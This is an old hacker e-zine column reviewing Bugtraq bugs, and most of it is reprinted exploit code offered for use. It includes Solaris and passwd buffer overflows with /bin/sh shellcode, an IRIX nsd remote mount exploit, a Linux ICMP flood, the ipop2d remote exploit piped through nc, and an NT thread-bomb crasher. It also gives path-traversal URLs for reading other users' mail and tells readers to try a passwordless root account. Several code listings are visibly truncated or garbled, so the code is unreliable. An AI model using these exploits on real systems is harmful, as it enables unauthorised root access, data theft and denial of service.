-->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ SUIDcyde ]:::::::::::::[OO--[ by bodie ]---[ bodi3@usa.net ]::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Bugtraq review --------- *NOTE* all these bugs have not been varified by me, use them at your own risk --------- been an interesting time recently on bugtraq. A was found in IE4 which means that if someone tries to bookmark your site, they will not be able to access their browser any more The bug works because IE5 tries to download a file called favicon.ico from the a web site when a user bookmarks it. It uses this icon to display next to the site in the faverites list. The bug works when the file isn't of the correct format, IE5 crashes :) This means you can stop all those script kiddies from bookmarking your site by putting a file called favicon.ico (just open up a t-file and write hello or something) This will encourage some people to use netscape and generally piss off microshaft. And the best part is, it's totally legal :) --- Another bug that was revealed was in the installation program for openlinux 2.2. The problem lies in that, when it installs it inserts a user in the password file called 'help'. This account is meant to be used to rescue the system if it crashes during installation. Why they don't just use root i don't know, but the account stays there after installation with root privs and no password. So if ya see any OL systems around try that out. I've seen 1 so far and it worked like a dream (of course i notified the sysadmin of it straight away :)) --- Yet more buffer overflows, this one for dtprintinfo, root. This exploit code works on Intel edition of Solaris2.6 and Solaris 2.7, you may have to fiddle with the code to get it working on other versions. To get it working you will have to type this first /*======================================================================== ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ======================================================================== */ static char x[1000]; #define ADJUST 0 #define STARTADR 621 #define BUFSIZE 900 #define NOP 0x90 unsigned long ret_adr; int i; char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33" "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88" "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f" "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46" "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01" "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } main() { putenv("LANG="); for (i=0;i> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); } --- another exploit is in the lpset command. This goes sorta like this /*=================================================================== ex_lpset.c Overflow Exploits( for Intel Edition ) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ===================================================================== */ #define OFFSET 0x3b88 #define STARTADR 700 #define ENDADR 1200 #define EX_STADR 8000 #define BUFSIZE 22000 #define NOP 0x90 unsigned long ret_adr; int i,adjust; char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55" "\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0" "\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e" "\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3" "\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08" "\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8" "\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } static char x[BUFSIZE]; main(int argc, char **argv) { memset(x,NOP,18000); ret_adr=get_sp()-OFFSET; printf("0 : x86 Solaris2.6 J\n1 : ?\n2 : ?\n3 : x86 Solaris 7 J\n"); printf("Input (0-3) : "); scanf("%d",&adjust); printf("Jumping Address = 0x%lx\n",ret_adr); for (i = adjust+STARTADR; i> 8 ) &0xff; x[i+0]=(ret_adr >> 16 ) &0xff; x[i+1]=(ret_adr >> 24 ) &0xff; } for (i=0;i> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } memcpy(x,EV,strlen(EV)); x[3000]=0; putenv(x); execl("/bin/passwd","passwd",(char *)0); } --- A lot of mail servers are now implementing web interfaces. This can be a problem whe usuffer holes like this. The following programs have these problems: CTMail: type: http://[server]:8002/../spool/username/mail.txt into your web browser and you can view the mail of the user FTGate: same as above except this seems to be a bit more reliable than the CTMail bug NTMail: This is even worse, it allows you to view any file on the system. Type: http://[server]:8000/../../../../../boot.ini. and your looking at boot.ini I'm sure u'll find nice ways of exploiting these bugs --- Yet more problems with IRIX comes in the nsd virtual file system. This allows local users to exploit root. Code coming: (sorry about the extended coments but i decided to include out of respect to the authour) /****************************************************************************** IRIX 6.5 nsd virtual filesystem exploit Author: Jefferson Ogata (JO317) Please note that this program comes with NO WARRANTY WHATSOEVER. Your use of this program constitutes your complete acceptance of all liability for any damage or loss caused by the aforesaid use. It is provided to the network community solely to document the existence of a vulnerability in the security implementations of certain versions of IRIX, and may not be used for any illicit purpose. Many of the details of the bug this program exploits have been available to users of SGI's online support system since February 1999. The current revision of IRIX (6.5.3) corrects this bug, at least enough to stop this particular exploit, and I strongly encourage you to bring your systems up to date as quickly as possible. With IRIX 6.5, SGI has moved all name services, NIS services, and DNS lookups into a userland process called nsd, which exports the results of the queries it fields into a virtual filesystem. The virtual filesystem is normally mounted onto the directory /ns by the program /sbin/nsmount, which is invoked by nsd on startup. The nsd daemon itself is exporting the filesystem via NFS3 over a dynamically bound UDP port -- rather than a well-known or settable one -- typically in the 1024-1029 range. On a desktop system, 1024 is a good bet, since nsd is usually the first RPC/UDP service to be started. The NFS filesystem is not registered with mountd, so there is no way to query mountd for a mount filehandle. But because the NFS port is fairly easy to discover through port scanning, and because the mount filehandle nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd filesystem from a host anywhere on the Internet. nsd will serve an array of NFS requests to anyone. Furthermore, because the service's NFS port is bound dynamically, it is difficult to protect it with a firewall; it may change from one system start to another, or if the daemon is killed and restarted. This program can successfully mount the nsd-exported virtual filesystem from a remote host onto a machine running IRIX 6.4 or higher. It makes use of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know what this flag does at the NFS protocol level, but it allows the client to ask the NFS server not to enforce certain permissions controls against the client. I don't know whether any other vendor NFS client systems support this flag. A clever person might write a userland NFS client that would accept an initial handle, NFS port, etc. as arguments. On an SGI with SGI C compiler, compile with: cc -o nsdadv nsdadv.c Run it this way: nsdadv /mnt sucker.example.com 1024 with obvious substitutions. So what are the security implications of this? Well, at the very least, the nsd filesystem on an NIS server reveals the NIS domain name, and what maps it contains, as well as what classes are being used. By exploring the filesystem shortly after it has been mounted I have been able to retrieve data that should be hidden from me, including shadow password entries from a remote system's shadow file. Beyond retrieving keys and maps, you can also monitor the filesystem for changes. A great deal of information is leaked through the contents of the nsd filesystem. For example, if host A looks up a host B's IP address, a file named B will appear in the /.local/hosts.byname directory in A's nsd filesystem. The file's contents will be the IP address. By the way, though you be unable to chdir into a particular location in the nsd filesystem, you may yet succeed under slightly different conditions. Eventually you can do it. I'm not sure why or when, but nsd gets picky sometimes. Eventually it relents. Specifically, I've found that the entire nsd filesystem appears readable for a few seconds after it is initially mounted. If you can't look at something, unmount the filesystem, remount it, and try again immediately. It also seems that a stat() is sometimes required before a chdir(). Your mileage may vary, but keep trying. You may wish to write a script to mount the nsd filesystem, explore and take inventory of its contents, and unmount the filesystem quickly. Once you've chdir'd into a directory, it appears you can always read it, although you can't necessarily stat its contents. This suggests a strategy of spawning a group of processes each with its cwd set to a subdirectory of the nsd filesystem, in order to retain visibility on the entire filesystem. Each process would generate an inventory of its cwd, and then monitor it for changes. A Perl script could do this well. Another thing: it is possible to create an empty file in nsd's exported filesystem simply by stat()ing a nonexistent filename. This suggests a potential DoS by creating many files in a directory. Remember that the system keeps a local cache in /var/ns, so you may have to wait for cached entries on the target host to expire before you'll see them reappear in the virtual filesystem. For some fairly extensive info on the nsd implementation, take a look at: http://www.bitmover.com/lm/lamed_arch.html ****** What got me into all this was that I found I could no longer run services chrooted if they required DNS. It took considerable effort to come up with a solution to this. This was a fundamental change from IRIX 6.4, and I know I'm not the only one who finds the nsd implementation to be a generally unpleasant direction, in part because it causes umount -t nfs to break system database services. I give SGI points for creativity -- in one sense, using NFS as a database access system is a very slick approach. But the database needs a security model, and the model needs to be implemented correctly. Neither of these needs appears to have been met. So how could SGI fix this? Without going back, SGI could at least make nsd respond only to queries from localhost (see note below about IRIX 6.5.3). The problem here is that they actually intend to support remote mounts in later releases, in order to supplement or supplant other means of distribution. The web documents indicate this. They could create a well-randomized mount filehandle for the filesystem and pass that to nsmount. Then you couldn't remotely mount the filesystem without guessing the handle -- nontrivial with a 32-byte handle. At the very least, they should provide libraries of regular BIND resolver routines, file-based getpwent, etc. routines, so one could choose the resolution strategy at link time, perhaps by modifying the shared library path. ****** With IRIX release 6.5.3, SGI appears to have fixed this problem, at least to some degree. The exploit does not appear to work as it does against 6.5.2. Further testing is needed, and the behavior should be watched carefully in future versions of IRIX. ****************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Filesystem type name for nsd-exported filesystem. */ #define NSD_FSTYPE "nfs3" /* File the records mounted filesystems. */ #define MTAB_FILE "/etc/mtab" /* Socket address we'll fill in with our destination IP and port. */ struct sockaddr_in sin; /* All zero file handle. This appears to be the base handle for the nsd filesystem. Great security, huh? */ unsigned char fh[NFS_FHSIZE] = { 0 }; /* NFS mount options structure to pass to mount(2). The meanings of these are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The flags field indicates that this is a soft mount without log messages, and to set the initial timeout and number of retries from fields in this structure. The fh field is a pointer to the filehandle of the mount point, whose size is set by fh_len. As noted above, the mount point filehandle is just 32 zeroes. */ struct nfs_args nx = { &sin, /* addr */ (fhandle_t *) fh, /* fh */ NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */ 0, /* wsize */ 0, /* rsize */ 100, /* timeo */ 2, /* retrans */ 0, /* hostname */ 0, /* acregmin */ 0, /* acregmax */ 0, /* acdirmin */ 0, /* acdirmax */ 0, /* symttl */ { 0 }, /* base */ 0, /* namemax */ NFS_FHSIZE, /* fh_len */ /* On IRIX 6.4 and up there are also the following... */ /* bdsauto */ /* bdswindow */ /* On IRIX 6.5 there are also the following... */ /* bdsbuflen */ /* pid */ /* maxthreads */ }; void usage (void) { fprintf (stderr, "usage: nsmount_remote directory host port\n\n"); fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on via NSD daemon\n"); fprintf (stderr, "port onto .\n\n"); exit (1); } int main (int argc, char **argv) { char *dir; char *host; char *ports; int port; struct hostent *h; int fstype; FILE *mtabf; struct mntent mnt = { 0, 0, NSD_FSTYPE, "soft,timeo=100,retrans=2", 0, 0, }; if (argc != 4) usage (); dir = argv[1]; host = argv[2]; port = atoi ((ports = argv[3])); /* Prepare for host lookup. */ memset ((void *) &sin, 0, sizeof (sin)); sin.sin_family = 2; sin.sin_port = port; /* Look up the host. */ if (inet_aton (host, &sin.sin_addr)) ; else if ((h = gethostbyname (host))) { unsigned long *l = (unsigned long *) *(h->h_addr_list); sin.sin_addr.s_addr = l[0]; } else { fprintf (stderr, "Cannot resolve host %s.\n", host); return 1; } /* Get filesystem type index for nsd filesystem type. */ if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0) { perror ("sysfs (" NSD_FSTYPE ")"); return 1; } fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n", host, inet_ntoa (sin.sin_addr), port, dir); /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR means "tell server to trust us with attributes" and MS_DATA means "6-argument mount". MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't seem to work without this option. So even though this program will compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to attack nsd. */ if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx)) != 0) { perror ("mount"); return 1; } /* Record mount point in /etc/mtab. */ mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1); sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports); mnt.mnt_dir = dir; if (!(mtabf = setmntent (MTAB_FILE, "r+"))) { perror ("setmntent"); return 1; } if (addmntent (mtabf, &mnt) < 0) { perror ("addmntent"); return 1; } if (endmntent (mtabf) < 0) { perror ("endmntent"); return 1; } return 0; } --- Microshaft are not having a good time (do they ever?). Another bug in IE5 was discovered. Put the following code into your web page to freeze IE and stop script kiddies viewing your web site -----cut here----- -----cut here----- This will put the background colour in an infinite loop and freeze IE --- Linux kernel 2.2.x seems to get into an awful mess when it is sent a large number of some types of ICMP packages. To exploit this bug, use this: #include #include #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; struct icmp icp; char text[1002]; } icmph; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(char *address, int socket, int prt) { struct hostent *host; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } struct sockaddr_in sin; bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i, ctr, k; int on = 1; struct sockaddr_in addrs; if (argc < 3) { printf("Usage: %s \n", argv[0]); exit(-1); } for (i = 0; i < 1002; i++) { icmph.text[i] = random() % 255; } sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); for (ctr = 0;ctr < 1001;ctr++) { ctr = ctr % 1000; addrs = sock_open(argv[1], sock, atoi(argv[2])); icmph.iph.version = 4; icmph.iph.ihl = 6; icmph.iph.tot_len = 1024; icmph.iph.id = htons(0x001); icmph.iph.ttl = 255; icmph.iph.protocol = IPPROTO_ICMP; icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) + ((random() % 255) * 65535) + ((random() % 255) * 255) + (random() % 255); icmph.iph.daddr = addrs.sin_addr.s_addr; icmph.iph.frag_off = htons(0); icmph.icp.icmp_type = random() % 14; icmph.icp.icmp_code = random() % 10; icmph.icp.icmp_cksum = 0; icmph.icp.icmp_id = 2650; icmph.icp.icmp_seq = random() % 255; icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024); if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("X"); } if (ctr == 0) printf("b00m "); fflush(stdout); } close(sock); } --- Another one of those rare jewls came out earlier this month: a remote root exploit. This time in ipop2d. use well: ---- SDI-pop2.c ------------------ /* * Sekure SDI (Brazilian Information Security Team) * ipop2d remote exploit for linux (Jun, 02 1999) * * by c0nd0r * * (read the instructions below) * * Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr, * falcon, vader, c_orb, marty(nordo!) and minha malinha! * also to #uground (irc.brasnet.org) and #SDI (efnet), * guys at el8.org, toxyn.org, pulhas.org * * Sincere Apologizes: duke (for the mistake we made with the wu-expl), * your code rocks. * * Usage: * * SDI-pop2 [offset] * * where imap_server = IMAP server at your box (or other place as well) * user = any account at your box * pass = the account's password * offset = 0 is default -- increase if it's necessary. * * Example: (netcat rocks) * * (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109 * * ---------------------------------------------------------------- * HOWTO-exploit: * * In order to gain remote access as user nobody, you should set * an IMAP server at your box (just edit the inetd.conf) or at * any other machine which you have an account. * * During the anonymous_login() function, the ipop2d will set the * uid to user nobody, so you are not going to get a rootshell. * ---------------------------------------------------------------- * * We do NOT take any responsability for the consequences of using * this code -- you've been warned! don't be a script k1dd13! * */ #include /* * (shellcode) * * jmp 0x1f * popl %esi * movl %esi,0x8(%esi) * xorl %eax,%eax * movb %eax,0x7(%esi) * movl %eax,0xc(%esi) * movb $0xb,%al * movl %esi,%ebx * leal 0x8(%esi),%ecx * leal 0xc(%esi),%edx * int $0x80 * xorl %ebx,%ebx * movl %ebx,%eax * inc %eax * int $0x80 * call -0x24 * .string \"/bin/sh\" * grab your shellcode generator at www.sekure.org */ char c0d3[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; main (int argc, char *argv[] ) { char buf[2500]; int x,y=1000, offset=0; long addr; char host[255], user[255], pass[255]; int bsize=986; if ( argc < 4) { printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n"); printf ( "usage: (SDI-pop2 [offset];cat) | nc lame.org 109\n"); exit (0); } snprintf ( host, sizeof(host), "%s", argv[1]); snprintf ( user, sizeof(user), "%s", argv[2]); snprintf ( pass, sizeof(pass), "%s", argv[3]); if ( argc > 4) offset = atoi ( argv[4]); /* gimme the ret + offset */ addr = 0xbffff3c0 + offset; fprintf ( stderr, "0wning data since 0x%x\n\n", addr); /* calculation of the return address position */ bsize -= strlen ( host); for ( x = 0; x < bsize-strlen(c0d3); x++) buf[x] = 0x90; for ( y = 0; y < strlen(c0d3); x++, y++) buf[x] = c0d3[y]; for ( ; x < 1012; x+=4) { buf[x ] = addr & 0x000000ff; buf[x+1] = (addr & 0x0000ff00) >> 8; buf[x+2] = (addr & 0x00ff0000) >> 16; buf[x+3] = (addr & 0xff000000) >> 24; } sleep (1); printf ( "HELO %s:%s %s\r\n", host, user, pass); sleep (1); printf ( "FOLD %s\r\n", buf); } ----- EOF --------------------- --- More problems in windoze9x, nt and all other versions at the moment, comes in the handling of files named prn.* Because in old versions of DOS, this was reserved as a way of accessing the printer, it will not let you create any files named prn.* This is o.k, becuase windows won't let you create a file with that name in any aplication. The problem, as usual with microshaft products comes in the implementation of networking. If you are able to access a file on a remote computer you can rename it to prn, and it will be unremoveable. This will only work if you access the remote computer using //computer/drive/* it will not work if you map a network drive to your computer. This could be a nasty flaw if someone done something like this: (talking DOS now) rename //computer/c/program files //computer/c/prn this would mean that the owner of the computer could not access, rename or delete his program files directory and would probably lose all the data in the directory. The only solution so far for this problem seems to be by using postix (a unix emulator for windows) to remove the file. Unix to the rescue once again. --- A few weeks ago MIRC 5.6 was released. This contains a serious vulnerability in that if you mention a url in a window, mirc will automaticly tell your browser to go to that page, oh no, more people with banners and this time you can't stop it from opening up your web browser and telling it to access the site. --- Any of you code kiddies out there want to crash and NT workstation? A nice little vulnerability that runs a large number of threads can crash it, and you won't be able to bring up the task manager. Here is the code: /* * frootcake.c * kiva@wookey.org * * this tests NT at coping with *really dodgy* code... * it totally brings my SMP box to being unusable (SP5) */ #include #include void poobah(); DWORD WINAPI thread_func (LPVOID lpv) { DWORD id; HANDLE h; BOOL success = 1; h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); while (success){ switch (GetThreadPriority (h)){ case THREAD_PRIORITY_ABOVE_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_BELOW_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_HIGHEST: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_IDLE: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_LOWEST: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; case THREAD_PRIORITY_NORMAL: success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); break; } } poobah(); return 0; } void poobah() { DWORD id; HANDLE h; h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id); SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL); poobah(); } int main () { printf ("frootcake - kiva@wookey.org\n"); poobah(); return 0; } --- As you always know, i like to save the best 'til last. Probably the most serious hole found recently is a whole that affects 90% of windows servers on the net, and allows you to execute code remotely. This is a VERY serious whole that can allow you to run any program you like, including netbus and back orafice. got to: http://www.eeye.com/database/advisories/ad06081999/ ad06081999-exploit.html for more info --- Thats all for now. All these bugs aren't garrenteed to work, i haven't varified most of them so don't come bitching when they don't